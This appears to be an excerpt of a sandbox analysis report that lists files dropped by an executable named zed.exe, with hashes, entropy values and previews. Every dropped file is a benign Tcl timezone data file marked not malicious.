                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Warsaw) {.. {-9223372036854775808 5040 0 LMT}.. {-2840145840 5040 0 WMT}.. {-1717032240 3600 0 CET}.. {-1693706400 7200 1 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618696800 7200 0 EET}.. {-1600473600 10800 1 EEST}.. {-1587168000 7200 0 EET}.. {-931734000 7200 0 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796870800 7200 0 CEST}.. {-796608000 3600 0 CET}.. {-778726800 7200 1 CEST}.. {-762660000 3600 0 CET}.. {-748486800 7200 1 CEST}.. {-733273200 3600 0 CET}.. {-715215600 7200 1 CEST}.. {-701910000 3600 0 CET}.. {-684975600 7200 1 CEST}.. {-670460400 3600 0 CET}.. {-654130800 7200 1 CEST}.. {-639010800 3600 0 CET}.. {-397094400 7200 1 CEST}.. {-386812800 3600 0 CET}.. {-371088000 72
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):187
                                                                                                                                                                                                                                            Entropy (8bit):4.899266605519742
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/sUE2tovXHAIgoq8sUE2oAovRL/yQa5rXv1/h8Q0:SlSWB9vsM3ymhrE2tSHAIgohrE2LovNB
                                                                                                                                                                                                                                            MD5:B07D9D3A5B0D11A578F77995A5FBE12B
                                                                                                                                                                                                                                            SHA1:1C4E186F2D53C0A1E6A82A6D33B172E403A41D6D
                                                                                                                                                                                                                                            SHA-256:A49B3894EB84F003EB357647D6A40CEAF6213523196CC1EC24EEFD7D9D6D3C3E
                                                                                                                                                                                                                                            SHA-512:43520AE325980B236C47C866620D1DA200AC0CD794E8EB642D2936D4B0ECEFE2DA0A93C9559D08581B3CCE2BC75251A4D5B967D376B16EB0C042B0ADCE1DCD01
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Belgrade)]} {.. LoadTimeZoneFile Europe/Belgrade..}..set TZData(:Europe/Zagreb) $TZData(:Europe/Belgrade)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):179
                                                                                                                                                                                                                                            Entropy (8bit):4.999265802825238
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV2cvXHAIgoq1csFARL/yQa58KXkcAEfh8Qaocqn:SlSWB9vsM3ym5HAIgoiAN/yjzVbh8C
                                                                                                                                                                                                                                            MD5:5B150E25521FE5DD8B83DD9B1B8F3A7A
                                                                                                                                                                                                                                            SHA1:0BB6F73F2C4B2464F3B1E62138843389AF1A07BC
                                                                                                                                                                                                                                            SHA-256:EF928AC09B9A366FD015F488B6A19FEFD72DE1BAF34E5CADFB8334946BCF19FE
                                                                                                                                                                                                                                            SHA-512:4A85A4E929EC6FE66AE60899FA55A75156D075CB2FE41C19337A128F5FA7363B9208AC2DC1BF4E44B76D5F115143D73F6D923E255EA78538D1BE4E45DEBA2049
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Kyiv)]} {.. LoadTimeZoneFile Europe/Kyiv..}..set TZData(:Europe/Zaporozhye) $TZData(:Europe/Kyiv)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7305
                                                                                                                                                                                                                                            Entropy (8bit):3.8199799674700277
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:94hH74elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlUxOrnW+:9Y41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:EBD66FAEA63E1B90122CC1EB21634ECE
                                                                                                                                                                                                                                            SHA1:C6487BB8AB2A6A72B2170B220F383ADB6B9AC91C
                                                                                                                                                                                                                                            SHA-256:95AFA61E439CA38551306D8FDB11C2788D935C42768D0407C9E4337F105A3E93
                                                                                                                                                                                                                                            SHA-512:25A8D0ED9BBE6BF23A1A76CC6D5378CF4D50544AA22DA97DDCD0673D7A5CCFEFFD81B660A1AEFB254B8BBEA55F6EF734BBBD3F0CB903E0721BE107667CA1E328
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Zurich) {.. {-9223372036854775808 2048 0 LMT}.. {-3675198848 1786 0 BMT}.. {-2385246586 3600 0 CET}.. {-904435200 7200 1 CEST}.. {-891129600 3600 0 CET}.. {-872985600 7200 1 CEST}.. {-859680000 3600 0 CET}.. {347151600 3600 0 CET}.. {354675600 7200 1 CEST}.. {370400400 3600 0 CET}.. {386125200 7200 1 CEST}.. {401850000 3600 0 CET}.. {417574800 7200 1 CEST}.. {433299600 3600 0 CET}.. {449024400 7200 1 CEST}.. {465354000 3600 0 CET}.. {481078800 7200 1 CEST}.. {496803600 3600 0 CET}.. {512528400 7200 1 CEST}.. {528253200 3600 0 CET}.. {543978000 7200 1 CEST}.. {559702800 3600 0 CET}.. {575427600 7200 1 CEST}.. {591152400 3600 0 CET}.. {606877200 7200 1 CEST}.. {622602000 3600 0 CET}.. {638326800 7200 1 CEST}.. {654656400 3600 0 CET}.. {670381200 7200 1 CEST}.. {686106000 3600 0 CET}.. {701830800 7200 1 CEST}.. {717555600 3600 0
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):170
                                                                                                                                                                                                                                            Entropy (8bit):4.8978035005721265
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVxKL823vXHAIgoqyKL8H6RL/wox6QavKL81n:SlSWB9vsM3ymvKA2PHAIgovKAH6N/wRj
                                                                                                                                                                                                                                            MD5:68667037110E713DB3F51922DDE929FE
                                                                                                                                                                                                                                            SHA1:2EB02BE3FD35F105B59847892A78F1AA21754541
                                                                                                                                                                                                                                            SHA-256:E20D829C605A7C5B2A96B83C3480DF28C964A13381A8BD2C72C2A37295131FA7
                                                                                                                                                                                                                                            SHA-512:3A8CC2EC9E3053283F996CA2C4B422061D47F1D16CA07985CBA2C838DF322C23CC9DD28033646F22EAE0E401781480B9D3AF82A539444166A4DD9B7BCCAE45FE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/London)]} {.. LoadTimeZoneFile Europe/London..}..set TZData(:GB) $TZData(:Europe/London)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):175
                                                                                                                                                                                                                                            Entropy (8bit):4.90874180513438
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVxKL823vXHAIgoqyKL8H6RL/w4b/h8QavKL81n:SlSWB9vsM3ymvKA2PHAIgovKAH6N/w4E
                                                                                                                                                                                                                                            MD5:625520BAAB774520AC54BFB9EDCF9FCA
                                                                                                                                                                                                                                            SHA1:C72F0FD45F448901C6B2E24243175729591B9A54
                                                                                                                                                                                                                                            SHA-256:C9334480D0A970254B6BA6FF22E958DC8DD8BF06288229461A551C7C094C3F1D
                                                                                                                                                                                                                                            SHA-512:1B672218FF9C86168E065A98C3B5F67DAB710D1C2A319E9D6599B397C4B4C00D3721B76C735C8AB04BCB618C1832B07F6CCDAF4266CC0D12A461A3A862D1AEB2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/London)]} {.. LoadTimeZoneFile Europe/London..}..set TZData(:GB-Eire) $TZData(:Europe/London)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                                                            Entropy (8bit):4.867609984313873
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/wZ8RDMovn:SlSWB9vsM3yFXHAIgnvVHN/wZ8RQy
                                                                                                                                                                                                                                            MD5:A01FE6FC260711F0E11C85DC3DE3550A
                                                                                                                                                                                                                                            SHA1:988311B71498591425C63669DC3F802F270B2C44
                                                                                                                                                                                                                                            SHA-256:747C15CDC239855D5380B7A7F47112F2A26C61B0BF300EEB9711E6521550D189
                                                                                                                                                                                                                                            SHA-512:BE4678DCBAE5DBC72865665413206C1909F28BA54F4943257870EFFBA6525457866DED7A985E89F2689C810B314DE4AA2FA3A0A1826A664727F5F7113AA56595
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:GMT) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):155
                                                                                                                                                                                                                                            Entropy (8bit):4.917182390229381
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/we7/8RDMovn:SlSWB9vsM3yFXHAIgnvVHN/wI8RQy
                                                                                                                                                                                                                                            MD5:3327B1BF3118AC6AFC02C31DF5B67CD9
                                                                                                                                                                                                                                            SHA1:3932577E66801AD31519B0BB56CCE7B9E36221A9
                                                                                                                                                                                                                                            SHA-256:BE48462CCFBB3AEE19597F082A17C2C5D2FD8BB1C9122245EFAB0A51F8F413B0
                                                                                                                                                                                                                                            SHA-512:53866FD513B039E8203E51FF3434D5736D3A4C4E0A46874D1C99A17115181AF749F0D079C2E14C5B0538D3DFA52B1645C977CD6599DA3EDA57CC7F84EEAB2D06
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:GMT+0) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):155
                                                                                                                                                                                                                                            Entropy (8bit):4.904279164422928
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/w4Hp8RDMovn:SlSWB9vsM3yFXHAIgnvVHN/w4J8RQy
                                                                                                                                                                                                                                            MD5:0CFFC5655F031D954BD623CC4C74DC9C
                                                                                                                                                                                                                                            SHA1:CE5E7AD67252F52D7E70719725FF5BE393DD6EF0
                                                                                                                                                                                                                                            SHA-256:944C86F516141DDC3AEC1AE4A963E9769879C48ED12DADDF4ED63A01313ACD00
                                                                                                                                                                                                                                            SHA-512:C7352D1394E8B8AC90CD19EE753D5277259BE5512ADDCAED2A2DEF144762CF20BE7A9FA09AAA1829EE401DD195C2AED8C967A7FF46739236E042AF4298EC84A2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:GMT-0) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):154
                                                                                                                                                                                                                                            Entropy (8bit):4.892526720357546
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/wPHp8RDMovn:SlSWB9vsM3yFXHAIgnvVHN/wvp8RQy
                                                                                                                                                                                                                                            MD5:565B41A5DB28F9FE7D220E9BA39062A4
                                                                                                                                                                                                                                            SHA1:5183689210F07C8A71F880DCE8E5C2CB62CEB17D
                                                                                                                                                                                                                                            SHA-256:54850A5F488205DB01FBB46E2DA9FFF951C4571029EA64D35932DDEA5346DAAF
                                                                                                                                                                                                                                            SHA-512:BD6E5141F06B03D62DCF725E9E48D6AA8ECD6E8E47A4015B25DC3F672392065FFFD80D688C6695324DC105EA528025CF447FA77E6D17E15D438E61DC51879CB7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:GMT0) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):159
                                                                                                                                                                                                                                            Entropy (8bit):4.917976058206477
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/wE+FB5yRDMovn:SlSWB9vsM3yFXHAIgnvVHN/wE6BURQy
                                                                                                                                                                                                                                            MD5:443FA76F107ED438F9571A044B848C6A
                                                                                                                                                                                                                                            SHA1:1CF508429DFC40643B1FAB336A249A3A287D8C7C
                                                                                                                                                                                                                                            SHA-256:9E7A8DAA26CE36E8F7D7F13460915C063EE98E2A4DB276AD9D15CA5C7C06815F
                                                                                                                                                                                                                                            SHA-512:6C0C5FF513A742FBDA349AC3A2581D456701B5348A54ECF38E496DAA1EFC74D937982B6F69F1761CC2FC4B88D9A971EFA2B16096E71EAF002EC5CE4130B533DE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:Greenwich) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):111
                                                                                                                                                                                                                                            Entropy (8bit):4.90682088010982
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x//LhdNMXGm2OH1V90v:SlSWB9eg/jJDm2OH1VGv
                                                                                                                                                                                                                                            MD5:79C82A5F8B034E71D0582371E3218DBB
                                                                                                                                                                                                                                            SHA1:1476CE8EA223095094B6D25D171E6319C96669F4
                                                                                                                                                                                                                                            SHA-256:8D710699AF319E0DDB83E9F3A32D07AE8082EA2F7EABBD345EFFFFB0F563062E
                                                                                                                                                                                                                                            SHA-512:ADEE55581D1A158929F09A63B03883ABE9193337DDF225C61AFDBB8A2C7D0BD248ADC4714E0EEFD334826C54C1AFFC8B1E6C2B0D6EF830C3CCA50CC79834F473
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:HST) {.. {-9223372036854775808 -36000 0 HST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):179
                                                                                                                                                                                                                                            Entropy (8bit):4.913328649996328
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8Li0vXHAIgN2qfvRL//XF1p4WFKQyvn:SlSWB9vsM3yW2HAIgAOvN///p4wKlvn
                                                                                                                                                                                                                                            MD5:6A307B229C302B1BAE783C8143809269
                                                                                                                                                                                                                                            SHA1:EA169AF81AD12380A69FB6B7A12479BA8B82878B
                                                                                                                                                                                                                                            SHA-256:359C9C02A9FA3DE10BA48FA0AB47D8D7AFF3B47F950CFAF5EB68F842EA52AB21
                                                                                                                                                                                                                                            SHA-512:505445FD0B3E140384EDC27993923BBF9ACD23A244B0F14D58804BFAA946D0BC4C0D301FBCCB492BAFDA42C8A92F4163FB96F4D75DD7374858D1C66183BEC24B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Hong_Kong)]} {.. LoadTimeZoneFile Asia/Hong_Kong..}..set TZData(:Hongkong) $TZData(:Asia/Hong_Kong)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):178
                                                                                                                                                                                                                                            Entropy (8bit):4.853280551555672
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/+GAKyx/2DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/+XZx+D4
                                                                                                                                                                                                                                            MD5:710D3A32EA8EAD11B45D4911DA8F2676
                                                                                                                                                                                                                                            SHA1:146D2A6D48940E58567EFA3BCA134D195E4649E6
                                                                                                                                                                                                                                            SHA-256:8A531293F672D8FE38996989FC4EEB22B5EFE6E046E2F58E94D01DA9CE56EF68
                                                                                                                                                                                                                                            SHA-512:70432973549C1A83036E0658AEE81C883F19D0D631E35F4C70F2EC69C9384E99340004618EF8B414D8EA9090C6C3120CF46A5D9ABDE4113917995B2844337988
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Iceland) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):190
                                                                                                                                                                                                                                            Entropy (8bit):4.807410166086502
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/+L6EL/liEi2eDcVVMB:SlSWB9vsM3y7VTHAIgNTxcAN/+LzM2eV
                                                                                                                                                                                                                                            MD5:0F20CBF1F7600D05F85D4D90FDAB2465
                                                                                                                                                                                                                                            SHA1:2F3C9479C4F4CD7999B19C07359B89A5FB1B9839
                                                                                                                                                                                                                                            SHA-256:1B1177CE4D59D7CBCAE9B0421EB00AD341ECB299BD15773D4ED077F0F2CE7B38
                                                                                                                                                                                                                                            SHA-512:657341FC2CCD6A4F7B405ABC8E24C651F6FFEFD68EBD6E2086ADF44834DCBF21D1B9D414436E42C8DCE46FFB88116B98C1D073782E214B3996D49EC00DFF4383
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Indian/Antananarivo) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):180
                                                                                                                                                                                                                                            Entropy (8bit):4.853088038233057
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/+L6EL9WJx3vFNMXGm2OHi/FvoHscfJ7XH0VQVFV6VVFSTVV:SlSWB9eg/+LxWJxPDm2OHqFvoH9+VQV3
                                                                                                                                                                                                                                            MD5:06143C3DFD86B3FE4F2A3060C0E05BB6
                                                                                                                                                                                                                                            SHA1:88E0E30CEE4AB8117860A35AD03B16AF48988789
                                                                                                                                                                                                                                            SHA-256:11044AD7CB0848CC734D2A67128AA6AC07CB89268399AA0A71A99024DE4B8879
                                                                                                                                                                                                                                            SHA-512:79195D3D0D475BEA982F40683D4BA14AC33B3FA91311F513DCED955C9297C2B0F12D94CCA930FAE0FB7F95DB34CD4E74B5AF0233E792122646592B7EFF0F3163
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Indian/Chagos) {.. {-9223372036854775808 17380 0 LMT}.. {-1988167780 18000 0 +05}.. {820436400 21600 0 +06}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):181
                                                                                                                                                                                                                                            Entropy (8bit):4.910217468889087
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8VLYO5YFfXHAIgN8ELYOJARL/+L6EL9FBIEWoxp4Wx:SlSWB9vsM3y1LePHAIgKELtAN/+LxpWg
                                                                                                                                                                                                                                            MD5:39CB9E58C0086B80FB12AC10A6D371E2
                                                                                                                                                                                                                                            SHA1:2A9A5CCA411779615A62D9E82023B6A066CB3CF3
                                                                                                                                                                                                                                            SHA-256:78A208B73426A1B6D7CF2FE89A0EF3F01721F877D569BC43F2E5B6625A947299
                                                                                                                                                                                                                                            SHA-512:BB6C8CF2B6AF9F93A7F7382A453261FA43E6E42E9ED1223F25A70DAD2ABBBF2F5777288553F4BC0155944754655D2C3F81BD81E5B1F611C4B2CCDB729B67AAC5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Bangkok)]} {.. LoadTimeZoneFile Asia/Bangkok..}..set TZData(:Indian/Christmas) $TZData(:Asia/Bangkok)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):174
                                                                                                                                                                                                                                            Entropy (8bit):4.818886812441817
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8nv3vXHAIgNnDA6RL/+L6EL9dEh4WFKsyn:SlSWB9vsM3yHvPHAIg15N/+Lxah4wKsy
                                                                                                                                                                                                                                            MD5:9462E9CFC88C3DA3CCCDA18C92E49A97
                                                                                                                                                                                                                                            SHA1:B50C82C6C7361BD6F028F82E2FEAF8486D798137
                                                                                                                                                                                                                                            SHA-256:EB301EE97A9FDE8ACE0243941C0FAC9ED0E3ACFD6497ABE408F08E95FAE3B732
                                                                                                                                                                                                                                            SHA-512:A48EBDA0A93C3505BC6149863F4A7B1043F856A8EB516CF42C050A95E81CD152BC1C0313B3DD115D53DABA95413AF34902D7D11C984DE5A03FC5FFADAF8EA89F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Yangon)]} {.. LoadTimeZoneFile Asia/Yangon..}..set TZData(:Indian/Cocos) $TZData(:Asia/Yangon)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):184
                                                                                                                                                                                                                                            Entropy (8bit):4.825881690094318
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/+L6EL9TKlBx+DcVVMB:SlSWB9vsM3y7VTHAIgNTxcAN/+LxGV+V
                                                                                                                                                                                                                                            MD5:7EBDFA311C7852AFADF880395071DE48
                                                                                                                                                                                                                                            SHA1:F6EC21FDFB75EC1BE45B1C4170147CBA3E870E7B
                                                                                                                                                                                                                                            SHA-256:53FA58E32DC2E4ABB574B2F78011815EEB7F89F453CC63C6B6C1460ABBB4CA5C
                                                                                                                                                                                                                                            SHA-512:DFBCD4EA4AFFA1D1CAE7308168874527FD36B5CAE76153AADA9C5E5F628258AB26654A16C8A5F8906FC5918398FD880B15B6DD4E3EF6AD3BE63D4A2455701FA8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Indian/Comoro) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):190
                                                                                                                                                                                                                                            Entropy (8bit):4.822075418239496
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqKGE4YF3vXHAIgnGED9HRL/+L6EL12h6hwL6ELzEov:SlSWB9vsM3ypGEVFPHAIgnGEtN/+L5Ry
                                                                                                                                                                                                                                            MD5:9AB222C67E079B55DDF3ACAE67BD0261
                                                                                                                                                                                                                                            SHA1:F9E6C34A00F9F1B152CEA729F087BD24993CA2E8
                                                                                                                                                                                                                                            SHA-256:138C7FFBFC520372658CA0CD1B42C4E5A240E9D9B98A277B02481DE5701222FC
                                                                                                                                                                                                                                            SHA-512:5F3EFF78506056F981DB0446436B39953D90265227890176D8287E2149B176B9DCCA14E795083B1EBC202D02AA88D584A9BB49868F30895EF17E92AA98ACB7C7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Indian/Maldives)]} {.. LoadTimeZoneFile Indian/Maldives..}..set TZData(:Indian/Kerguelen) $TZData(:Indian/Maldives)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):170
                                                                                                                                                                                                                                            Entropy (8bit):4.84472938642971
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8DeXHAIgN6S7ARL/+L6ELzJM1h4WFKQ3n:SlSWB9vsM3yj+HAIgMS7AN/+L/Yh4wKC
                                                                                                                                                                                                                                            MD5:C866B2A879786B7D9341FA904FC7D01A
                                                                                                                                                                                                                                            SHA1:DAF7B405E6DAA0C88C6F3A26AAA172E38CE5CAF3
                                                                                                                                                                                                                                            SHA-256:613C5C05A8867E4B59A97A3D8C7235DDC0CA23239F2D57A5BFD42E4AB94FD510
                                                                                                                                                                                                                                            SHA-512:BB01A464366F1F93591F48C42F300421AF774E50E5B5232AB0C755482E3306EDDB54A9BCF6E9D325EAE63AAC6D3857F4D754FC28A34F90AC728B7158B61E2C57
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Dubai)]} {.. LoadTimeZoneFile Asia/Dubai..}..set TZData(:Indian/Mahe) $TZData(:Asia/Dubai)..
